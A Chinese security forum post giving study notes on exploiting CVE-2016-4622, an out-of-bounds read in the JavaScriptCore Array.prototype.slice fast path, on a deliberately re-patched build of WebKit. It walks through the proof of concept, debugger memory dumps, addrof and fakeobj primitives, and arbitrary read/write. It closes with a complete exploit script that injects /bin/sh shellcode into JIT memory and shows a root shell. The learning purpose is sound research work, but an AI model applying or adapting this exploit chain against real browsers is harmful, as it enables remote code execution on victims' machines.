[原创]CVE-2016-4622 Webkit slice学习笔记
发表于: 2020-4-8 15:34 6111
今天的文章分享是 i 春秋论坛作者PwnRabb1t原创的文章,关于CVE-2016-4622 Webkit slice的一篇学习笔记,文章篇幅较长,阅读约15分钟,文章未经许可禁止转载!
在fireshell 2020之前的时候遇到了很多webkit的pwn题,发现webkit还可以在ubuntu上编译,于是燃起了学习欲望,决定研究一下webkit的漏洞利用。
ubuntu 18.04 虚拟机 webkit (3af5ce129e6636350a887d01237a65c2fce77823) gdb(pwndbg 插件),lldb
webkit在github上有对应的副本,可以直接git clone下来,然后checkout到我们使用的版本3af5ce129e6636350a887d01237a65c2fce77823。
git clone --depth=1 https://github.com/WebKit/webkit git fetch --unshallow
Tools/gtk/install-dependencies Tools/Scripts/build-webkit --jsc-only --debug
╰─○ ./Debug/bin/jsc >>> 1+1 2 >>> a=[1.1] 1.1 >>> describe(a) Object: 0x7fffaf4b4340 with butterfly 0x7fe0000e4008 (Structure 0x7fffaf4f2a70:[Array, {}, >>>
cve-2016-0622 是好多年前的洞了,有漏洞的分支在ubuntu1804上编译不了,我们使用的分支是18年的,要得到有漏洞的程序,我们需要手动打一下patch。
diff --git a/Source/JavaScriptCore/runtime/ArrayPrototype.cpp b/Source/JavaScriptCore/runtime/ArrayPrototype.cpp index c37389aa857..f77821c89ae 100644 --- a/Source/JavaScriptCore/runtime/ArrayPrototype.cpp +++ b/Source/JavaScriptCore/runtime/ArrayPrototype.cpp @@ -973,7 +973,7 @@ EncodedJSValue JSC_HOST_CALL arrayProtoFuncSlice(ExecState* exec) if (UNLIKELY(speciesResult.first == SpeciesConstructResult::Exception)) return { }; - bool okToDoFastPath = speciesResult.first == SpeciesConstructResult::FastPath && isJSArray(thisObj) && length == toLength(exec, thisObj); + bool okToDoFastPath = speciesResult.first == SpeciesConstructResult::FastPath && isJSArray(thisObj); RETURN_IF_EXCEPTION(scope, { }); if (LIKELY(okToDoFastPath)) { if (JSArray* result = asArray(thisObj)->fastSlice(*exec, begin, end - begin)) diff --git a/Source/JavaScriptCore/runtime/ObjectInitializationScope.cpp b/Source/JavaScriptCore/runtime/ObjectInitializationScope.cpp index e19c8a92a4e..550bc2fe270 100644 --- a/Source/JavaScriptCore/runtime/ObjectInitializationScope.cpp +++ b/Source/JavaScriptCore/runtime/ObjectInitializationScope.cpp @@ -44,7 +44,7 @@ ObjectInitializationScope::~ObjectInitializationScope() { if (!m_object) return; - verifyPropertiesAreInitialized(m_object); + //verifyPropertiesAreInitialized(m_object); } void ObjectInitializationScope::notifyAllocated(JSObject* object, bool wasCreatedUninitialized)
python import sys sys.path.insert(0, "/webkit/webkit/Tools/gdb") import webkit
跟d8类似,jsc可以用describe函数来打印出对象的内存信息(d8中的%DebugPrint),但是它没有类似d8%SystemBreak的断点函数,这里我用readline( )函数代替,可以让程序停下来,然后查看内存。
Reading symbols from ./Debug/bin/jsc...done. pwndbg> r Starting program: /webkit/webkit/WebKitBuild/Debug/bin/jsc [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". [New Thread 0x7ffff0781700 (LWP 33916)] >>> a=[1.1] 1.1 >>> describe(a) Object: 0x7fffaf4b4340 with butterfly 0x7fe0000e4008 (Structure 0x7fffaf4f2a70:[Array, {}, ArrayWithDouble, Proto:0x7fffaf4c80a0, Leaf]), StructureID: 98 >>>
下面是cve的poc,执行之后得到的是一堆的浮点数,b是a.slice出来的,valueOf的返回值是10,相当于是b=a.slice(0,10)这样,但是这个操作是在valueOf里面a.length =0执行之后做的,这样slice之后就是一个数组越界了。
var a = []; for (var i = 0; i < 100; i++) a.push(i + 0.123); var b = a.slice(0, { valueOf: function() { a.length = 0; return 10; } } ); print(b); //0.123,1.123,1.5488838078e-314,1.5488838078e-314,1.5488838078e-314,1.5488838078e-314,1.5488838078e-314,1.5488838078e-314,1.5488838078e-314,1.5488838078e-314
我们给原始码的patch去掉了arrayProtoFuncSlice函数的length == toLength(exec, thisObj)检查,它对应的数组类型的slice函数,继承如下,对应我们的poc。
EncodedJSValue JSC_HOST_CALL arrayProtoFuncSlice(ExecState* exec){ // https://tc39.github.io/ecma262/#sec-array.prototype.slice VM& vm = exec->vm(); auto scope = DECLARE_THROW_SCOPE(vm); JSObject* thisObj = exec->thisValue().toThis(exec, StrictMode).toObject(exec); EXCEPTION_ASSERT(!!scope.exception() == !thisObj); if (UNLIKELY(!thisObj)) return { }; // 获取 array 的长度, 这里 a.length == 100 unsigned length = toLength(exec, thisObj); RETURN_IF_EXCEPTION(scope, { }); // slice 获取 slice 函数的 begin 和 end, 这里分别是 0, 10 unsigned begin = argumentClampedIndexFromStartOrEnd(exec, 0, length); RETURN_IF_EXCEPTION(scope, { }); unsigned end = argumentClampedIndexFromStartOrEnd(exec, 1, length, length); RETURN_IF_EXCEPTION(scope, { }); if (end < begin) end = begin; std::pair<SpeciesConstructResult, JSObject*> speciesResult = speciesConstructArray(exec, thisObj, end - begin); // We can only get an exception if we call some user function. EXCEPTION_ASSERT(!!scope.exception() == (speciesResult.first == SpeciesConstructResult::Exception)); if (UNLIKELY(speciesResult.first == SpeciesConstructResult::Exception)) return { }; //bool okToDoFastPath = speciesResult.first == SpeciesConstructResult::FastPath && isJSArray(thisObj) && length == toLength(exec, thisObj); bool okToDoFastPath = speciesResult.first == SpeciesConstructResult::FastPath && isJSArray(thisObj) ; if (LIKELY(okToDoFastPath)) { if (JSArray* result = asArray(thisObj)->fastSlice(*exec, begin, end - begin)) return JSValue::encode(result); } //..................... static inline unsigned argumentClampedIndexFromStartOrEnd(ExecState* exec, int argument, unsigned length, unsigned undefinedValue = 0){ JSValue value = exec->argument(argument); if (value.isUndefined()) return undefinedValue; double indexDouble = value.toInteger(exec); if (indexDouble < 0) { indexDouble += length; return indexDouble < 0 ? 0 : static_cast<unsigned>(indexDouble); } return indexDouble > length ? length : static_cast<unsigned>(indexDouble); }
在获取slice的end参数的时候,会先执行valueOf里面的内容,这里是a.length = 0;,于是JSC::JSArray::setLength函数会被调用,如果原来的数组长度大于64,它会调用reallocateAndShrinkButterfly根据长度重新给数组分配一个butterfly。
那么poc的valueOf执行完之后,a就分配到了一个更小的内存里面了,然后的a.length=0,接着arrayProtoFuncSlice会调用JSC::JSArray::fastSlice(fastSlice不会检查array的length)把原来a[0 , 10]的内存复制到b里面,于是就有了数组越界了。
bool JSArray::setLength(ExecState* exec, unsigned newLength, bool throwException) { VM& vm = exec->vm(); auto scope = DECLARE_THROW_SCOPE(vm); Butterfly* butterfly = this->butterfly(); switch (indexingMode()) { //... case ArrayWithUndecided: case ArrayWithInt32: case ArrayWithDouble: case ArrayWithContiguous: { if (newLength == butterfly->publicLength()) return true; if (newLength > MAX_STORAGE_VECTOR_LENGTH // This check ensures that we can do fast push. || (newLength >= MIN_SPARSE_ARRAY_INDEX && !isDenseEnoughForVector(newLength, countElements()))) { RELEASE_AND_RETURN(scope, setLengthWithArrayStorage( exec, newLength, throwException, ensureArrayStorage(vm))); } if (newLength > butterfly->publicLength()) { if (!ensureLength(vm, newLength)) { throwOutOfMemoryError(exec, scope); return false; } return true; } unsigned lengthToClear = butterfly->publicLength() - newLength; unsigned costToAllocateNewButterfly = 64; // a heuristic. if (lengthToClear > newLength && lengthToClear > costToAllocateNewButterfly) { reallocateAndShrinkButterfly(vm, newLength); return true; } if (indexingType() == ArrayWithDouble) { for (unsigned i = butterfly->publicLength(); i-- > newLength;) butterfly->contiguousDouble().at(this, i) = PNaN; } else { for (unsigned i = butterfly->publicLength(); i-- > newLength;) butterfly->contiguous().at(this, i).clear(); } butterfly->setPublicLength(newLength); return true; } //.. } }
|* |* The top 16-bits denote the type of the encoded JSValue: |* |* Pointer { 0000:PPPP:PPPP:PPPP |* / 0001:****:****:**** |* Double { ... |* \ FFFE:****:****:**** |* Integer { FFFF:0000:IIII:IIII |* |* The scheme we have implemented encodes double precision values by performing a |* 64-bit integer addition of the value 2^48 to the number. After this manipulation |* no encoded double-precision value will begin with the pattern 0x0000 or 0xFFFF. |* Values must be decoded by reversing this operation before subsequent floating point |* operations may be peformed. |* |* 32-bit signed integers are marked with the 16-bit tag 0xFFFF. |* |* The tag 0x0000 denotes a pointer, or another form of tagged immediate. Boolean, |* null and undefined values are represented by specific, invalid pointer values: |* |* False: 0x06 |* True: 0x07 |* Undefined: 0x0a |* Null: 0x02
(lldbinit) r Process 35875 launched: './Debug/bin/jsc' (x86_64) >>> a=[1.1] 1.1 >>> describe(a) Object: 0x7fffaf4b4340 with butterfly 0x7fe0000e4008 (Structure 0x7fffaf4f2a70:[Array, {}, ArrayWithDouble, Proto:0x7fffaf4c80a0, Leaf]), StructureID: 98 >>> Process 35875 stopped * thread #1, name = 'jsc', stop reason = signal SIGSTOP frame #0: 0x00007ffff344e0b4 libc.so.6`__GI___libc_read at read.c:27 (lldbinit) x/10gx 0x7fffaf4b4340 0x7fffaf4b4340: 0x0108210700000062 0x00007fe0000e4008 0x7fffaf4b4350: 0x00000000badbeef0 0x00000000badbeef0 0x7fffaf4b4360: 0x00000000badbeef0 0x00000000badbeef0 0x7fffaf4b4370: 0x00000000badbeef0 0x00000000badbeef0 0x7fffaf4b4380: 0x00000000badbeef0 0x00000000badbeef0 (lldbinit) p/x *(JSC::JSObject *)0x7fffaf4b4340 (JSC::JSObject) $3 = { JSC::JSCell = { m_structureID = 0x00000062 m_indexingTypeAndMisc = 0x07 m_type = 0x21 m_flags = 0x08 m_cellState = 0x01 } m_butterfly = (m_value = 0x00007fe0000e4008) }
>>> a=[1.1] 1.1 >>> describe(a) Object: 0x7fffaf4b4340 with butterfly 0x7fe0000e4008 (Structure 0x7fffaf4f2a70:[Array, {}, ArrayWithDouble, Proto:0x7fffaf4c80a0, Leaf]), StructureID: 98 >>> a.push({}) 2 >>> describe(a) Object: 0x7fffaf4b4340 with butterfly 0x7fe0000e4008 (Structure 0x7fffaf4f2ae0:[Array, {}, ArrayWithContiguous, Proto:0x7fffaf4c80a0]), StructureID: 99 >>> a.x=1 1 >>> describe(a) Object: 0x7fffaf4b4340 with butterfly 0x7fe0000e0028 (Structure 0x7fffaf470310:[Array, {x:100}, ArrayWithContiguous, Proto:0x7fffaf4c80a0, Leaf]), StructureID: 294
- 构造addrof和fakeobj
- 构造任意地址读写
- 改写jit编写shellcode getshell
jsc和d8些许的不同,但是基本思路还是差不多的,我们先要有下面两个函数,方便做double到unsigned long类型的转换。
var conversion_buffer = new ArrayBuffer(8) var f64 = new Float64Array(conversion_buffer) var i32 = new Uint32Array(conversion_buffer) var BASE32 = 0x100000000 function f2i(f) { f64[0] = f return i32[0] + BASE32 * i32[1] } function i2f(i) { i32[0] = i % BASE32 i32[1] = i / BASE32 return f64[0]
function addrof(obj){ var a=[]; for(var i=0;i<100;i++){ a.push(i+0.123); } var b=a.slice(0,{ valueOf:function(){ a.length=0; print(describe(a)) var c=[obj]; print(describe(c)) return 10; } }); print(describe(b)) return f2i(b[4]); } test = [1.1]; print(addrof(test).toString(16)) readline()
内存分配都会把差不多一样的内存块分配到一起,这里a和c的分配是连续的,c中存放的是一个对象,slice之后会被拷贝到b的butterfly里面,然后读b [4]就可以拿到原来obj的地址。
Object: 0x7fffaf4b4390 with butterfly 0x7fe0000fe928 (Structure 0x7fffaf4f2a70:[Array, {}, ArrayWithDouble, Proto:0x7fffaf4c80a0, Leaf]), StructureID: 98 Object: 0x7fffaf4b43a0 with butterfly 0x7fe0000fe948 (Structure 0x7fffaf4f2ae0:[Array, {}, ArrayWithContiguous, Proto:0x7fffaf4c80a0]), StructureID: 99 Object: 0x7fffaf4b43b0 with butterfly 0x7fe0000d4078 (Structure 0x7fffaf4f2a70:[Array, {}, ArrayWithDouble, Proto:0x7fffaf4c80a0, Leaf]), StructureID: 98 pwndbg> x/20gx 0x7fe0000fe928 //a (length == 0) 0x7fe0000fe928: 0x3fbf7ced916872b0 0x3ff1f7ced916872b 0x7fe0000fe938: 0x00000000badbeef0 0x0000000300000001 // c = [obj] 0x7fe0000fe948: 0x00007fffaf4b4380 0x0000000000000000 0x7fe0000fe958: 0x0000000000000000 0x00000000badbeef0 0x7fe0000fe968: 0x00000000badbeef0 0x00000000badbeef0 0x7fe0000fe978: 0x00000000badbeef0 0x00000000badbeef0 0x7fe0000fe988: 0x00000000badbeef0 0x00000000badbeef0 0x7fe0000fe998: 0x00000000badbeef0 0x00000000badbeef0 0x7fe0000fe9a8: 0x00000000badbeef0 0x00000000badbeef0 0x7fe0000fe9b8: 0x00000000badbeef0 0x00000000badbeef0 pwndbg> x/20gx 0x7fe0000d4078 0x7fe0000d4078: 0x3fbf7ced916872b0 0x3ff1f7ced916872b 0x7fe0000d4088: 0x00000000badbeef0 0x0000000300000001 0x7fe0000d4098: 0x00007fffaf4b4380 0x0000000000000000 0x7fe0000d40a8: 0x0000000000000000 0x00000000badbeef0 0x7fe0000d40b8: 0x00000000badbeef0 0x00000000badbeef0 0x7fe0000d40c8: 0x7ff8000000000000 0x7ff8000000000000 0x7fe0000d40d8: 0x7ff8000000000000 0x00000000badbeef0 0x7fe0000d40e8: 0x00000000badbeef0 0x00000000badbeef0 0x7fe0000d40f8: 0x00000000badbeef0 0x00000000badbeef0 0x7fe0000d4108: 0x00000000badbeef0 0x00000000badbeef0
function fakeobj(addr){ var a=[]; for(var i=0;i<100;i++){ a.push(0x1337) } addr = i2f(addr); var b= a.slice(0,{ valueOf:function(){ a.length=1; var c=[addr] return 10; } }); print(describe(b)) return b[4]; } //test=[1.1] //var tmp = fakeobj(addrof(test)) //print(describe(test)) //print(describe(tmp)) //readline()
Object: 0x7fffaf4b4390 with butterfly 0x7fe0000fe928 (Structure 0x7fffaf4f2a70:[Array, {}, ArrayWithDouble, Proto:0x7fffaf4c80a0, Leaf]), StructureID: 98 Object: 0x7fffaf4b43a0 with butterfly 0x7fe0000fe948 (Structure 0x7fffaf4f2ae0:[Array, {}, ArrayWithContiguous, Proto:0x7fffaf4c80a0]), StructureID: 99 Object: 0x7fffaf4b43b0 with butterfly 0x7fe0000d4078 (Structure 0x7fffaf4f2a70:[Array, {}, ArrayWithDouble, Proto:0x7fffaf4c80a0, Leaf]), StructureID: 98
JSObject和butterfly的内存分配就不在一个地方,在v8中我们可以用改写map之类的来构造内存读写,这里就写不到了,但是jsc中存在有inline类型的数据,像下面这样,它会把前6个属性保存在JSObject的下面,我们可以把伪造的对象放在这个地方,然后`fakeobj(0x7fffaf4b0080 + 0x10)就可以拿到这个伪造的对象。
>>> test={a:1,b:2,c:3,d:4,e:5,f:6,g:7} [object Object] >>> describe(test) Object: 0x7fffaf4b0080 with butterfly 0x7fe0000fe6e8 (Structure 0x7fffaf4705b0:[Object, {a:0, b:1, c:2, d:3, e:4, f:5, g:100}, NonArray, Proto:0x7fffaf4b4000, Leaf]), StructureID: 300 >>> Process 39470 stopped * thread #1, name = 'jsc', stop reason = signal SIGSTOP frame #0: 0x00007ffff344e0b4 libc.so.6`__GI___libc_read at read.c:27 (lldbinit) x/10gx 0x7fffaf4b0080 0x7fffaf4b0080: 0x010016000000012c 0x00007fe0000fe6e8 0x7fffaf4b0090: 0xffff000000000001 0xffff000000000002 0x7fffaf4b00a0: 0xffff000000000003 0xffff000000000004 0x7fffaf4b00b0: 0xffff000000000005 0xffff000000000006 0x7fffaf4b00c0: 0x00000000badbeef0 0x00000000badbeef0
>>> var tmp = new ArrayBuffer(0x1000) undefined >>> var f64 = new Float64Array(tmp) undefined >>> describe(tmp) Object: 0x7fffaf4c8280 with butterfly (nil) (Structure 0x7fffaf4f3640:[ArrayBuffer, {}, NonArray, Proto:0x7fffaf4c81e0, Leaf]), StructureID: 125 >>> describe(f64) Object: 0x7fffaf4c8360 with butterfly 0x7fe0000e4008 (Structure 0x7fffaf4707e0:[Float64Array, {}, NonArray, Proto:0x7fffaf4b4350, Leaf]), StructureID: 305 >>> Process 40107 stopped * thread #1, name = 'jsc', stop reason = signal SIGSTOP frame #0: 0x00007ffff344e0b4 libc.so.6`__GI___libc_read at read.c:27 (lldbinit) x/10gx 0x7fffaf4c8360 0x7fffaf4c8360: 0x01082c0000000131 0x00007fe0000e4008 0x7fffaf4c8370: 0x00007fe8000ff000 0x0000000200000200 0x7fffaf4c8380: 0x010217000000003a 0x0000000000000000 0x7fffaf4c8390: 0x00007fffaf4cc000 0x00000000badbeef0 0x7fffaf4c83a0: 0x010217000000003a 0x0000000000000000 (lldbinit) x/10gx 0x00007fe8000ff000 0x7fe8000ff000: 0x0000000000000000 0x0000000000000000 0x7fe8000ff010: 0x0000000000000000 0x0000000000000000 0x7fe8000ff020: 0x0000000000000000 0x0000000000000000 0x7fe8000ff030: 0x0000000000000000 0x0000000000000000 0x7fe8000ff040: 0x0000000000000000 0x0000000000000000 (lldbinit) x/10gx 0x7fffaf4c8280 0x7fffaf4c8280: 0x010023000000007d 0x0000000000000000 0x7fffaf4c8290: 0x00007fffefec1840 0x00000000badbeef0 0x7fffaf4c82a0: 0x01002e0000000043 0x0000000000000000 0x7fffaf4c82b0: 0x00007fffaf468060 0x00007fffaf4d0060 0x7fffaf4c82c0: 0x01002e0000000043 0x0000000000000000 (lldbinit) p/x *(JSC:JSArrayBufferView*)0x7fffaf4c8360 (JSC::JSArrayBufferView) $0 = { JSC::JSNonFinalObject = { JSC::JSObject = { JSC::JSCell = { m_structureID = 0x00000131 m_indexingTypeAndMisc = 0x00 m_type = 0x2c m_flags = 0x08 m_cellState = 0x01 } m_butterfly = (m_value = 0x00007fe0000e4008) } } m_vector = { m_barrier = { m_value = (m_ptr = 0x00007fe8000ff000) } } m_length = 0x00000200 m_mode = 0x00000002 } Fix-it applied, fixed expression was: *(JSC::JSArrayBufferView*)0x7fffaf4c8360
现在的m_vector加上了gigicage的保护CagedPtr<Gigacage::Primitive, void, tagCagedPtr> m_vector,gigacage是jsc中内存隔离的机制。
enum class HeapKind { Primary, PrimitiveGigacage, JSValueGigacage //butterfly };
jsc保存一个磁盘分区g_gigacageBasePtrs,保存着不同类型的内存的基地址,内存块之间有32GB的间隔,因为jsc中数组下标的定义是unsigned int类型,这样能够防止数组越界。
pwndbg> p &g_gigacageBasePtrs $1 = (char (*)[4096]) 0x55555561f000 <g_gigacageBasePtrs> pwndbg> x/10gx 0x55555561f000 0x55555561f000 <g_gigacageBasePtrs>: 0x00007fe800000000 0x00007ff000000000 0x55555561f010 <g_gigacageBasePtrs+16>: 0x0000000000000000 0x0000000000000000 0x55555561f020 <g_gigacageBasePtrs+32>: 0x0000000000000000 0x0000000000000000 0x55555561f030 <g_gigacageBasePtrs+48>: 0x0000000000000000 0x0000000000000000 0x55555561f040 <g_gigacageBasePtrs+64>: 0x0000000000000000 0x0000000000000000
var structs = []; function sprayStructures() { for (var i = 0; i < 1000; i++) { var a = [13.37]; a['prop'] = 13.37; a['prop' + i] = 13.37; structs.push(a); } } sprayStructures() var victim = structs[0x300]; var header_arrayDouble=i2f(0x0108210700000200-0x1000000000000) var container={ fake_header:header_arrayDouble, butterfly: victim } container_addr=addrof(container); hax = fakeobj(container_addr+0x10);// fake object
//hax jscell //victim butterfly --------> jscell (hax[1]) butterfly ----->(read/write anywhere)
我们修改hax [1]的值,也就是修改被攻击者的butterfly字段到想要读写的地址,然后读取被攻击者就可以任意地址读写。
read64:function(addr){ hax[1]=i2f(addr+0x10) return this.addrof(victim.prop) }, write64:function(addr,data){ hax[1]=i2f(addr+0x10) victim.prop = this.fakeobj(data) },
写JIT getshell
getJITFunction : function (){ function target(num) { for (var i = 2; i < num; i++) { if (num % i === 0) { return false; } } return true; } for (var i = 0; i < 1000; i++) { target(i); } for (var i = 0; i < 1000; i++) { target(i); } for (var i = 0; i < 1000; i++) { target(i); } return target; },
var conversion_buffer = new ArrayBuffer(8) var f64 = new Float64Array(conversion_buffer) var i32 = new Uint32Array(conversion_buffer) var BASE32 = 0x100000000 function f2i(f) { f64[0] = f return i32[0] + BASE32 * i32[1] } function i2f(i) { i32[0] = i % BASE32 i32[1] = i / BASE32 return f64[0] } var structs = []; function sprayStructures() { for (var i = 0; i < 1000; i++) { var a = [13.37]; a['prop'] = 13.37; a['prop' + i] = 13.37; structs.push(a); } } function addrof(obj){ var a=[]; for(var i=0;i<100;i++){ a.push(i+0.123); } var b=a.slice(0,{ valueOf:function(){ a.length=0; //print(describe(a)) var c=[obj]; //print(describe(c)) return 10; } }); //print(describe(b)) return f2i(b[4]); } function fakeobj(addr){ var a=[]; for(var i=0;i<100;i++){ a.push(0x1337) } addr = i2f(addr); var b= a.slice(0,{ valueOf:function(){ a.length=0; var c=[addr] print(describe(a)) print(describe(c)) return 10; } }); print(describe(b)) return b[4]; } sprayStructures() var victim = structs[0x300]; var header_arrayDouble=i2f(0x0108210700000200-0x1000000000000) var container={ fake_header:header_arrayDouble, butterfly: victim } //print(describe(container)) container_addr=addrof(container); hax = fakeobj(container_addr+0x10); print(container_addr.toString(16)); print(describe(hax)); print(describe(victim)); //ArrayWithDouble var unboxed = [1.1] unboxed[0]=3.3 //ArrayWithContigous var boxed = [{}] hax[1] = i2f(addrof(unboxed)) var shared = victim[1] hax[1] = i2f(addrof(boxed)) victim[1] = shared; print(describe(unboxed)) print(describe(boxed)) var stage2={ addrof: function(obj){ boxed[0]=obj; return f2i(unboxed[0]) }, fakeobj: function(addr){ unboxed[0]=i2f(addr) return boxed[0] }, read64:function(addr){ hax[1]=i2f(addr+0x10) return this.addrof(victim.prop) }, write64:function(addr,data){ hax[1]=i2f(addr+0x10) victim.prop = this.fakeobj(data) }, getJITFunction : function (){ function target(num) { for (var i = 2; i < num; i++) { if (num % i === 0) { return false; } } return true; } for (var i = 0; i < 1000; i++) { target(i); } for (var i = 0; i < 1000; i++) { target(i); } for (var i = 0; i < 1000; i++) { target(i); } return target; }, getRWXMem: function(){ shellcodeFunc = this.getJITFunction() target_addr = this.read64(this.addrof(shellcodeFunc)+8*3) print(target_addr.toString(16)) target_addr = this.read64(target_addr + 8*3) target_addr = this.read64(target_addr + 8*4) return [shellcodeFunc, target_addr] }, injectShellcode : function (addr, shellcode){ var theAddr = addr; for(var i=0, len=shellcode.length; i < len; i++){ this.write64(target_addr+i, shellcode[i].charCodeAt()); } }, pwn:function(){ shellcodeObj = this.getRWXMem(); shellcode = "j;X\x99RH\xbb//bin/shST_RWT^\x0f\x05" this.injectShellcode(shellcodeObj[1], shellcode); var shellcodeFunc = shellcodeObj[0]; shellcodeFunc(); }, }; stage2.pwn()
{} WebKitBuild ./Debug/bin/jsc exp.js Object: 0x7fffaf40c360 with butterfly 0x7fe0000be8e8 (Structure 0x7fffaf4f2a00:[Array, {}, ArrayWithInt32, Proto:0x7fffaf4c80a0, Leaf]), StructureID: 97 Object: 0x7fffaf40c370 with butterfly 0x7fe0000be908 (Structure 0x7fffaf4f2a70:[Array, {}, ArrayWithDouble, Proto:0x7fffaf4c80a0]), StructureID: 98 Object: 0x7fffaf40c380 with butterfly 0x7fe0000d81c8 (Structure 0x7fffaf4f2a00:[Array, {}, ArrayWithInt32, Proto:0x7fffaf4c80a0, Leaf]), StructureID: 97 7fffaf4c8380 Object: 0x7fffaf4c8390 with butterfly 0x7fffaf4b7380 (Structure 0x7fffaf4423e0:[Array, {prop:100, prop194:101}, ArrayWithDouble, Proto:0x7fffaf4c80a0, Leaf]), StructureID: 512 Object: 0x7fffaf4b7380 with butterfly 0x7fe0000c12b8 (Structure 0x7fffaf41e4c0:[Array, {prop:100, prop768:101}, ArrayWithDouble, Proto:0x7fffaf4c80a0, Leaf]), StructureID: 1086 Object: 0x7fffaf40c390 with butterfly 0x7fe0000be928 (Structure 0x7fffaf4f2a70:[Array, {}, ArrayWithDouble, Proto:0x7fffaf4c80a0]), StructureID: 98 Object: 0x7fffaf40c3a0 with butterfly 0x7fe0000be928 (Structure 0x7fffaf4f2ae0:[Array, {}, ArrayWithContiguous, Proto:0x7fffaf4c80a0]), StructureID: 99 7fffaf4fe680 # id uid=0(root) gid=0(root) groups=0(root) #
总的来说webkit的pwn和v8的思路上差不多,只是这两个的内存布局不太一样,要搞清楚还是需要花挺多时间的。最新的webkit还加上了structure id random的保护机制,让structure id变了得更加不可预测,后续会分享关于学习这个防护原理以及绕过思路的相关文章,感兴趣的小伙伴请及时关注。